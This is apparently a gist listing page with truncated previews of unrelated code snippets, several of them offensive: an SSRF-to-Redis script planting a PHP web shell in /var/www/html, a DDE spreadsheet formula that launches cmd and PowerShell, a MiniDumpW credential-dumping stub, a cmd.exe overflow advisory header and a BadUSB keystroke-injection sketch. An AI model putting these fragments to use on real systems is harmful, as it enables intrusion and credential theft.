This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from idaapi import * | |
from idc import * baseaddr = 0x10000 start = 0x301E64 + baseaddr end = 0x3293b4 + baseaddr | |
ea = start | |
while ea <= end: | |
create_strlit(Dword(ea), BADADDR) | |
func_name = get_strlit_contents(Dword(ea)) | |
if func_name: | |
func_name = str (func_name) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <cstdio> | |
#include <windows.h> | |
#include <DbgHelp.h> | |
#include <iostream> | |
#include <TlHelp32.h> | |
#include <stdio.h> | |
#pragma comment(lib,"Dbghelp.lib") | |
typedef HRESULT(WINAPI* _MiniDumpW)( | |
DWORD arg1, DWORD arg2, PWCHAR cmdline); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Restaurant Customer Clerk | |
Arbys 30.8400 154.5700 | |
31.0000 170.3050 | |
457.5500 467.7750 | |
460.8875 465.8875 | |
461.0375 466.0375 | |
Bo Jangles 33.4000 154.5400 | |
Boston Market 33.1600 154.5150 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script> | |
bb = new MSBlobBuilder(); | |
bb.append("test data 2"); | |
window.navigator.msSaveOrOpenBlob(bb.getBlob(),"testing2.txt"); | |
</script> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
import ( | |
"fmt" | |
"syscall" | |
"time" | |
"unsafe" | |
) | |
const ( |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import urllib.parse | |
protocol = "gopher://" | |
ip = "127.0.0.1" | |
port = "6788" | |
shell = "\n\n<?php eval($_POST[\"test\"]);?>\n\n" # | |
filename = "1.php" | |
path = "/var/www/html" | |
passwd = "" | |
cmd = ["flushall", |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#include <stdio.h> | |
#define MIN_COUNT 10 | |
CHAR current[256]; | |
int main() { | |
DWORD passed = 0; | |
memset(current, 0x00, 256); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Title: Microsoft Windows cmd.exe - Stack Buffer Overflow | |
# Author: John Page (aka hyp3rlinx) | |
# Date: 15/09/2021 | |
# Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CMD.EXE-STACK-BUFFER-OVERFLOW.txt | |
# ISR: ApparitionSec | |
[Vendor] | |
www.microsoft.com | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c powershell.exe /c calc'!AO |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <HID.h> | |
#include <Keyboard.h> | |
void setup() {//initialization | |
Keyboard.begin();//Start keyboard communication | |
delay(5000);//delay | |
Keyboard.press(KEY_LEFT_GUI);//win key | |
delay(500); | |
Keyboard.press('r');//r key | |
delay(500); |